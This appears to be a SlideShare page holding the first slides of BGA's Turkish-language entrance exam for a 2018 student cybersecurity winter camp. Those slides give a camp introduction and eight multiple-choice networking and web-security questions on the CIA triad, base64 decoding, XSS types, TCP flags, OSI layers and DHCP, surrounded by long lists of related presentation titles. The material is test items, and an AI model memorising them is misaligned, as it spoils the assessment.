Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Hacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu AnaliziHacklenmiş Web Sunucu Analizi
Hacklenmiş Web Sunucu Analizi
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"
NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"
NetsecTR "Her Yönüyle Siber Tehdit İstihbaratı"
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 4, 5, 6
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 10, 11, 12
 
Zararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC Kullanımı
Zararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC KullanımıZararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC Kullanımı
Zararlı Yazılım Tespiti ve Siber i̇stihbarat Amaçlı IOC Kullanımı
 
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİGÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
GÜVENLİ YAZILIM GELİŞTİRME EĞİTİMİ İÇERİĞİ
 
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların KullanımıPenetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
Penetrasyon Testlerinde Açık Kod Yazılımların Kullanımı
 

Semelhante a Siber Güvenlik Kış Kampı'18 Soruları

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiBGA Cyber Security
 
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...BGA Cyber Security
 
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...CypSec - Siber Güvenlik Konferansı
 
Güvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaGüvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaBGA Cyber Security
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaBGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriPRISMA CSI
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıCypSec - Siber Güvenlik Konferansı
 
Siber Savunma Ürünlerinde Profesyonel Arka Kapılar
Siber Savunma Ürünlerinde Profesyonel Arka KapılarSiber Savunma Ürünlerinde Profesyonel Arka Kapılar
Siber Savunma Ürünlerinde Profesyonel Arka KapılarBGA Cyber Security
 
Huzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka Kapılar
Huzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka KapılarHuzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka Kapılar
Huzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka KapılarKasım Erkan
 
Mobil Programlama Soruları
Mobil Programlama SorularıMobil Programlama Soruları
Mobil Programlama SorularıAhmet Han
 
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
14. Ege Bilgi Guvenligi Etkinligi By Cagri PolatÇağrı Polat
 
Arp protokolu ve guvenlik zafiyeti
Arp  protokolu ve guvenlik zafiyetiArp  protokolu ve guvenlik zafiyeti
Arp protokolu ve guvenlik zafiyetiBGA Cyber Security
 
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİMSiber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİMSparta Bilişim
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBGA Cyber Security
 
Siber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarBGA Cyber Security
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıBGA Cyber Security
 
Cuneyd Uzun - Dijital Dünyada Siber Risk Yönetimi
Cuneyd Uzun -  Dijital Dünyada Siber Risk YönetimiCuneyd Uzun -  Dijital Dünyada Siber Risk Yönetimi
Cuneyd Uzun - Dijital Dünyada Siber Risk YönetimiCüneyd Uzun
 
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarAlper Başaran
 
GUVENLI YAZILIM ve BILGI GUVENLIGI
GUVENLI YAZILIM ve BILGI GUVENLIGIGUVENLI YAZILIM ve BILGI GUVENLIGI
GUVENLI YAZILIM ve BILGI GUVENLIGIAhmet Pekel
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ BGA Cyber Security
 

Semelhante a Siber Güvenlik Kış Kampı'18 Soruları (20)

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web	Uygulama Saldırıları ve Klasik Çözümlerin YetersizliğiWeb	Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği
 
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı Güvenlik Önlem...
 
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
Huzeyfe Önal - SSL, DPI Kavramları Eşliğinde Internet Trafiği İzleme ve Karşı...
 
Güvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi ToplamaGüvenlik Testlerinde Bilgi Toplama
Güvenlik Testlerinde Bilgi Toplama
 
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini AtlatmaISTSEC 2013 -  Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
ISTSEC 2013 - Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma
 
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik TemelleriBeyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
Beyaz Şapkalı Hacker CEH Eğitimi - Siber Güvenlik Temelleri
 
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle SaldırılarıOnur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
Onur Alanbel & Ozan Uçar - Ulusal Siber Güvenlikte Kitle Saldırıları
 
Siber Savunma Ürünlerinde Profesyonel Arka Kapılar
Siber Savunma Ürünlerinde Profesyonel Arka KapılarSiber Savunma Ürünlerinde Profesyonel Arka Kapılar
Siber Savunma Ürünlerinde Profesyonel Arka Kapılar
 
Huzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka Kapılar
Huzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka KapılarHuzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka Kapılar
Huzeyfe Önal - Siber Savunma Sistemlerinde Profesyonel Arka Kapılar
 
Mobil Programlama Soruları
Mobil Programlama SorularıMobil Programlama Soruları
Mobil Programlama Soruları
 
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
14. Ege Bilgi Guvenligi Etkinligi By Cagri Polat
 
Arp protokolu ve guvenlik zafiyeti
Arp  protokolu ve guvenlik zafiyetiArp  protokolu ve guvenlik zafiyeti
Arp protokolu ve guvenlik zafiyeti
 
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİMSiber Güvenlik Eğitimleri | SPARTA BİLİŞİM
Siber Güvenlik Eğitimleri | SPARTA BİLİŞİM
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
Siber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka KapılarSiber Dünyada Modern Arka Kapılar
Siber Dünyada Modern Arka Kapılar
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 
Cuneyd Uzun - Dijital Dünyada Siber Risk Yönetimi
Cuneyd Uzun -  Dijital Dünyada Siber Risk YönetimiCuneyd Uzun -  Dijital Dünyada Siber Risk Yönetimi
Cuneyd Uzun - Dijital Dünyada Siber Risk Yönetimi
 
Rusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılarRusya kaynaklı siber saldırılar
Rusya kaynaklı siber saldırılar
 
GUVENLI YAZILIM ve BILGI GUVENLIGI
GUVENLI YAZILIM ve BILGI GUVENLIGIGUVENLI YAZILIM ve BILGI GUVENLIGI
GUVENLI YAZILIM ve BILGI GUVENLIGI
 
INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
 

Mais de BGA Cyber Security

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiBGA Cyber Security
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiBGA Cyber Security
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?BGA Cyber Security
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketlerBGA Cyber Security
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıBGA Cyber Security
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020BGA Cyber Security
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriBGA Cyber Security
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakBGA Cyber Security
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIBGA Cyber Security
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiBGA Cyber Security
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİBGA Cyber Security
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Cyber Security
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerBGA Cyber Security
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsBGA Cyber Security
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi ToplamaBGA Cyber Security
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiBGA Cyber Security
 
Güvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
Güvenlik Testlerinde Açık Kaynak İstihbaratı KullanımıGüvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
Güvenlik Testlerinde Açık Kaynak İstihbaratı KullanımıBGA Cyber Security
 

Mais de BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 
SSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain TespitiSSL Sertifikalarından Phishing Domain Tespiti
SSL Sertifikalarından Phishing Domain Tespiti
 
Güvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
Güvenlik Testlerinde Açık Kaynak İstihbaratı KullanımıGüvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
Güvenlik Testlerinde Açık Kaynak İstihbaratı Kullanımı
 
Mail Sniper Nedir?
Mail Sniper Nedir?Mail Sniper Nedir?
Mail Sniper Nedir?
 

Siber Güvenlik Kış Kampı'18 Soruları

  • 1. SİBER GÜVENLİK KIŞ KAMPI’18 SORULARI Yazar:BGA BilgiGüvenliğiAKADEMİSİ Baskı:2017/12
  • 2. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity Giriş BGA Bilgi Güvenliği AKADEMİSİ, “Siber Güvenlik” konusunda kariyer yapmak ve bu konuda uzmanlaşmak isteyen üniversite öğrencilerini, Siber Güvenlik Kamp’larına davet ediyor. Ülkemizde Siber Güvenlik ile ilgili nitelikli eleman yetiştirme potansiyeli sadece %1 seviyesindedir. Bu alandaki insan kaynağı eksikliğini gidermek ve ülkemizin Ulusal Siber Güvenlik vizyonunu tamamlanmasına destek olmak amacı ile Bilgi Güvenliği AKADEMİSİ tarafından Siber Güvenlik Kamp’ları düzenlenmektedir. Siber güvenlik alanında teknik çalışmalar yürüten, üretmeyi ve projeler geliştirmeyi hedefleyen Bilgi Güvenliği AKADEMİSİ, sosyal sorumluluk projesi olarak gerçekleştirdiği Siber Güvenlik Kamp’ları ile bu alanda uzman yetiştirmeyi ve sektör katkı sağlamayı amaçlamaktadır. Bu alandaki insan gücü ihtiyacını karşılamak ve sektöre deneyimli, uzman personeller yetiştirmek amacı ile gerçekleştirilen Siber Güvenlik Kamplar’ına katılmaya hak kazanan öğrencilerin tüm masrafları, Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından karşılanacaktır. Siber Güvenlik Kampı’na katılacak olan öğrenciler, Bilgi Güvenliği AKADEMİSİ’nin tecrübeli eğitmenleri ve sektörün önde gelen Siber Güvenlik Uzmanları’ndan 7 gün süreyle özel eğitim alma fırsatı yakalayacaklardır. Hacking, zafiyet tarama, zararlı yazılım analizi, mobil güvenlik, DDOS saldırılarına karşı doğru savunma gibi birçok konuda eğitim alacak olan Siber Güvenlik Kampı öğrencileri, eğitici ve öğretici CTF yarışmaları sayesinde takım çalışması yeteneklerini de arttıracak ve öğrenmiş oldukları bilgileri pekiştirebileceklerdir. Siber Güvenlik Kış Kampı’na katılıma hak kazanan öğrenciler, bilgi güvenliği alanında deneyim sahibi akademisyenler, kamu ve özel sektör yöneticileri ile de bir araya gelerek bu alanındaki kariyer fırsatları konusunda da bilgi sahibi olacaklar. “Gerçekleştirmiş olduğumuz Siber Güvenlik Kamp’larına bugüne kadar 20.000’den fazla başvuru yapıldı. Bu başvurularda ise 250’den fazla öğrenci Siber Güvenlik uzmanlarımız tarafından yetiştirildi ve sektöre kazandırıldı” Siber Güvenlik Kış Kampı’na üniversitelerin Ön Lisans, Lisans, Yüksek Lisans veya Doktora programlarında öğrenimleri devam eden kişiler kabul edilecektir. Kampa katılmaya hak kazanan öğrencilerin konaklama, yeme, içme, eğitim ve diğer giderleri Bilgi Güvenliği AKADEMİSİ ve sponsor firmalar tarafından karşılanacaktır. Kamp, başvurular ve sorularınız ile ilgili daha fazla bilgi almakiçin SiberKamp.org adresini ziyaret edebilir, eğitmen ve destekleyen firmalar hakkında bilgi edinebilirsiniz.
  • 3. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORULAR SORU 1: Bir web sayfasının içeriği saldırganlar tarafından değiştirildiğinde aşağıdaki "bilgi güvenliği" kriterinden hangisi zarar görmüş olur? A) Gizlilik B) Bütünlük C) Kullanılabilirlik D) İnkâr Edilemezlik E) Hiçbiri SORU 2: Analiz için almış olduğumuz bir ağ trafiği dosyası incelenirken içerisinde NTFiM3JfNnV2RW5sMWtfazE1X2s0bVAxXzIwMTg= şeklinde bir bilgi tespit edilmiştir. Bu veri ne anlama gelmektedir? CEVAP: ………………………….. SORU 3: Saldırgan, kurban olarak belirlediği bir kişiye özel mesaj üzerinden http://k.url/s6k4mP1 şeklinde kısaltılmış bir link göndermektedir. Kurban bu linki açtığında karşısına bir pop-up mesajı çıkmaktadır. Bu noktada saldırgan aşağıdaki yöntemlerden hangisini veya hangilerini kullandığı söylenebilir? A) SQL Injection B) ARP Poisining C) ICMP Redirect D) Stored XSS E) Insecure Direct Object Reference(IDOR) F) ICMP Redirect G) Brute Force H) HTTP Flood I) Dom tabanlı XSS J) Reflected XSS SORU 4: TCP RST bayrağı ne işe yarar? A) Bağlantı başlatmak için kullanılır. B) Bağlantı sonrası oturum doğrulamak için kullanılır. C) Bağlantıyı tamamen sonlandırmak için kullanılır. D) Bağlantıdaki paketin öncelikli olduğunu belirtmek için kullanılır. E) TCP’nin üçlü el sıkışmasını başarıyla tamamlamak için kullanılır.
  • 4. [SİBER GÜVENLİK KIŞ KAMPI’18 SINAV SORULARI] BGA Bilgi Güvenliği A.Ş. | www.bgasecurity.com | @BGASecurity SORU 5: ICMP, OSI modeline göre hangi katmanda çalışır? A) 4 B) 3-2 C) 3 D) 5 E) 2 SORU 6: Aşağıdaki servislerden hangileri TCP kullanır? 1. DHCP 2. SMTP 3. HTTP 4. TFTP 5. FTP A) 1 ve 2 B) 2, 3 ve 5 C) 1, 2 ve 4 D) 1, 3 ve 5 E) 3 ve 5 SORU 7: OSI modelinin transport katmanı TCP/IP modelinde hangi katmana karşılık gelmektedir? A) Application B) Host-to-Host C) Internet D) Network Access E) Data Link SORU 8: 2048 tane cihazın (kullanıcının) bulunduğu bir ağ yapınız mevcut. IP yapılandırmaları ile ilgili olarak IP adresini, alt ağ maskesini, varsayılan gateway’i ve DNS sunucusuna ait bilgileri otomatik olarak dağıtmanız isteniyor. Bunu gerçekleştirmek için aşağıdaki protokollerden hangisini veya hangilerini kullanırsınız? A) SMTP B) SNMP C) ARP D) RARP E) DHCP
